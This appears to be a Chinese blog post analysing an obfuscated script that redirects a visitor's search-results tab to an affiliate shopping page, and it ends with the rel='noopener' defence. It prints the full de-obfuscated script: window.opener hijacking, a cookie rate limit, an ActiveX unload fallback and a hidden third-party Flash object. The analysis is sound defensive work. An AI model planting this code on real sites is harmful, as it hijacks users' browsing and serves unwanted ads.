关于通过搜索引擎跳转到淘宝问题

今天看到一个帖子询问该内容,以前也碰到过没有注意,以为是ISP投放的广告,今天分析了下。

从效果上来说很像搜索引擎自己投放的,不过仔细一想,能挂广告的地方很多并不需要这种大大降低体验的方式来投放广告,首先看下案例,在Google上搜索硬盘 C7,标题为“有C7错误的硬盘们都注意了 - 电脑新生代”的快照,然后会在新页面打开,原Google搜索结果页跳转到了天猫。

通过Chrome的开发工具抓包:

会在打开新页面的时候搜索结果页面请求该URL,这个页面的代码就不贴了,由于该跳转只跳转一次,我估计得判断cookie,所以查看了下结果页面的cookie:

首先确认下是不是靠cookie判断的,是的话就应该不是搜索引擎的问题了,经过尝试就是上图所圈的内容,删除之后又会跳转。

找找新页面的js,找到下面的内容:

打开该URL的js查看内容是eval加密,解密后的结果如下:

// Analyst annotations on the de-obfuscated sample (the code itself is left exactly as recovered).
// Summary: when the page carrying this script was opened from a search-engine result, the
// script uses window.opener to navigate the ORIGINAL results tab to an affiliate landing page,
// rate-limits itself with the "oc_busy" cookie, and injects a hidden Flash object.
// Observable indicators in this listing: cookie name "oc_busy", a zero-size DIV positioned at
// left:-100px, and a destination URL that only exists as concatenated string fragments.
if ("undefined" == typeof(_5had0w)) {
    // Run-once guard: everything hangs off one implicit global used as a namespace.
    _5had0w = [];
    // Referrer allow-list of search engines and portals; tested against document.referrer below.
    // The dots are unescaped, so each "." matches any character.
    _5had0w.ssite = new RegExp("(www.baidu.com)|(www.google.c)|(www.youdao.com)|(search.cn.yahoo.com)|(search.yahoo.com)|(114search.118114.cn)|(bing.118114.cn)|(search.114.vnet.cn)|(bing.com)|(www.soso.com)|(www.sogou.com)|(www.taobao.com)|(gougou.com)|(www.gouwo.com)|(cache.baidu.com)|(m.baidu.com)|(baidu.asp)|(hao123.com)|(265.com)|(114la.com)|(115.com)|(etao.com)", "i");
    // Window to operate on: this window, or the parent when the parent exposes `f` and an
    // element with id "fulliframe". Errors are swallowed (presumably cross-origin access).
    _5had0w.win = window;
    try {
        if (parent && parent.f && parent.document.getElementById("fulliframe")) {
            _5had0w.win = parent
        }
    } catch(e) {}
    _5had0w.host = _5had0w.win.location.host;
    if (!_5had0w.host) _5had0w.host = "";
    // Returns the unescaped value of the first cookie named sName, or "" when absent.
    _5had0w.getcookie = function (sName) {
        var aCookie = document.cookie.split("; ");
        for (var i = 0; i < aCookie.length; i++) {
            var aCrumb = aCookie[i].split("=");
            if (sName == aCrumb[0]) return unescape(aCrumb[1])
        }
        return ""
    };
    // Writes the "oc_busy" cookie with a 6-minute lifetime and path "/". This is the marker
    // that suppresses repeat redirects; once it expires or is deleted the redirect fires again.
    // Note: `date` is assigned without var, so it leaks into the page's global scope.
    _5had0w.setcookie = function (sValue) {
        date = new Date();
        date.setMinutes(date.getMinutes() + 6);
        document.cookie = "oc_busy=" + escape(sValue) + "; expires=" + date.toGMTString() + ";path=/"
    };
    // Char code of the first character of the host after stripping www./blog./bbs. (0 if NaN).
    // Not read anywhere else in this listing.
    _5had0w.hcode = _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charCodeAt(0);
    if (isNaN(_5had0w.hcode)) _5had0w.hcode = 0;
    // Redirect base URL, assembled from fragments so the full string never appears literally
    // in the script (presumably to defeat plain string matching). Suffixes "p", "e" and "n"
    // are appended by the different code paths below.
    _5had0w.mall = "htt" + "p://s.t" + "kur" + "l.c" + "om/gom" + "all.ht" + "ml?";
    // onunload handler for the fallback path: asks the embedded ActiveX object to open the
    // URL (suffix "p") when the page is left. Only runs where document.attachEvent exists.
    _5had0w.powerboom = function () {
        try {
            var urlp = _5had0w.mall + "p";
            if (document.attachEvent) {
                _5had0w.pnode.launchURL(urlp);
                _5had0w.pnode = null;
                self.focus()
            }
        } catch(e) {}
    };
    // Arms the fallback: creates a zero-size ActiveX object (this CLSID is the Windows Media
    // Player control) using the legacy-IE createElement-with-markup form, then hooks onunload.
    _5had0w.nvPower = function () {
        try {
            if (document.attachEvent) {
                _5had0w.pnode = document.createElement("<object width=0 height=0 classid='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6'></object>");
                window.attachEvent("onunload", _5had0w.powerboom)
            }
        } catch(e) {}
    };
    // Disarms the fallback: drops the object reference and removes the onunload hook.
    _5had0w.detachPower = function () {
        try {
            if (window.detachEvent) {
                _5had0w.pnode = null;
                window.detachEvent("onunload", _5had0w.powerboom)
            }
        } catch(e) {}
    };
    // Fallback redirect of the CURRENT window (suffix "e"), after marking the cookie.
    _5had0w.nvEnter = function () {
        _5had0w.detachPower();
        _5had0w.setcookie("_mall");
        _5had0w.win.location = _5had0w.mall + "e"
    };
    // Click handler installed on page links in the fallback path: lets the click proceed
    // (returns true) and redirects this window 1.5 s later.
    _5had0w.shadowClick = function () {
        setTimeout(_5had0w.nvEnter, 1500);
        return true
    };
    // np becomes true only when every opener-navigation attempt in nvIt has thrown.
    _5had0w.np = false;
    // Core of the behaviour described in the article: navigate the tab that opened this
    // page. Tries opener.location, then opener.navigate, then opener.opener.navigate; if all
    // throw, arms the ActiveX fallback. This depends on window.opener being available, which
    // the opening page can prevent by using rel="noopener" on its links.
    _5had0w.nvIt = function (lochref) {
        try {
            _5had0w.win.opener.location = lochref
        } catch(e) {
            try {
                _5had0w.win.opener.navigate(lochref)
            } catch(e2) {
                try {
                    _5had0w.win.opener.opener.navigate(lochref)
                } catch(e3) {
                    _5had0w.nvPower();
                    _5had0w.np = true
                }
            }
        }
    };
    // Cookie gate: redirect the opener (suffix "n") only when "oc_busy" is empty or lacks
    // "mall"; the cookie is then updated unless the fallback path was taken.
    _5had0w.nvUrl = function () {
        var _co = _5had0w.getcookie("oc_busy");
        if (_co == "" || _co.indexOf("mall") < 0) {
            _5had0w.nvIt(_5had0w.mall + "n");
            if (!_5had0w.np) {
                _5had0w.setcookie(_co + "_mall")
            }
        }
    };
    // Trigger condition: the page has an opener AND the referrer matches the allow-list.
    // Direct visits and visits from other sites are left alone.
    if (_5had0w.win.opener) {
        if (_5had0w.ssite.test(_5had0w.win.document.referrer)) {
            _5had0w.nvUrl()
        }
    }
    // Injects arbitrary HTML through innerHTML inside a zero-size DIV placed off-screen.
    _5had0w.appendChild = function (html) {
        var node = document.createElement("DIV");
        node.style.width = "0";
        node.style.height = "0";
        node.style.position = "absolute";
        node.style.left = "-100px";
        node.innerHTML = html;
        document.body.appendChild(node)
    };
    // Same hidden container, but loads one external script per argument.
    // Not called anywhere in this listing.
    _5had0w.appendScript = function () {
        if (1 > arguments.length) return;
        var node = document.createElement("DIV");
        node.style.width = "0";
        node.style.height = "0";
        node.style.position = "absolute";
        node.style.left = "-100px";
        for (var i = 0; i < arguments.length; i++) node.appendChild(document.createElement('script')).src = arguments[i];
        document.body.appendChild(node)
    };
    // Load handler: polls every 200 ms until document.body exists, then injects a hidden
    // Flash object and, in the fallback case, rewires the page's links.
    _5had0w.oload = function () {
        if (document.body == null) {
            setTimeout(_5had0w.oload, 200)
        } else {
            // SWF URL on the same host as the redirect target, again built from fragments.
            var fp = "htt" + "p://s.t" + "kur" + "l.c" + "om/bro" + "adp.s" + "wf";
            // flashVars: d = first character of the stripped host; b=ff is added for browsers
            // without attachEvent, or for Opera.
            var pm = "d=" + _5had0w.host.replace(/(www|blog|bbs)\./ig, "").charAt(0);
            try {
                if ((!document.attachEvent) || navigator.userAgent.indexOf("Opera") > -1) {
                    pm += "&b=ff"
                }
            } catch(e) {}
            // allowScriptAccess="always" lets the third-party SWF call into this page's script.
            var str = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0" width="0" height="0"><param name="allowScriptAccess" value="always"/><param name="movie" value="' + fp + '"/><param name="flashVars" value="' + pm + '"/><embed src="' + fp + '" flashVars="' + pm + '" width="0" height="0" allowScriptAccess="always" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" /></object>';
            _5had0w.appendChild(str);
            // Fallback only: every link whose href does not contain "javascript" is forced to
            // open in a new window and gets shadowClick, so this window is redirected after a click.
            if (_5had0w.np) {
                var ls = document.links;
                if (ls.length && ls.length > 0) {
                    for (var i = 0; i < ls.length; i++) {
                        if (ls[i].href.indexOf("javascript") < 0) {
                            ls[i].target = "_blank";
                            ls[i].onclick = _5had0w.shadowClick
                        }
                    }
                }
            }
        }
    };
    // Register oload for the window load event (attachEvent on legacy IE, addEventListener elsewhere).
    try {
        if (document.attachEvent) {
            window.attachEvent("onload", _5had0w.oload)
        } else {
            window.addEventListener("load", _5had0w.oload, false)
        }
    } catch(e) {}
}

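具体内容一看代码就知道了,我反正是半懂不懂的,具体解决方法的话可以尝试加黑名单,不过具体还应该是浏览器方面的问题吧,通过一个页面的js可以控制其他页面跳转?从上面的代码看,原因在于新页面是由搜索结果页打开的,脚本通过 window.opener 拿到了原页面的引用,再改写它的 location(即 nvIt 里的 _5had0w.win.opener.location = lochref)。打开链接的页面如果给链接加上 rel="noopener",新页面的 window.opener 就是 null,这种跳转就做不到了。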
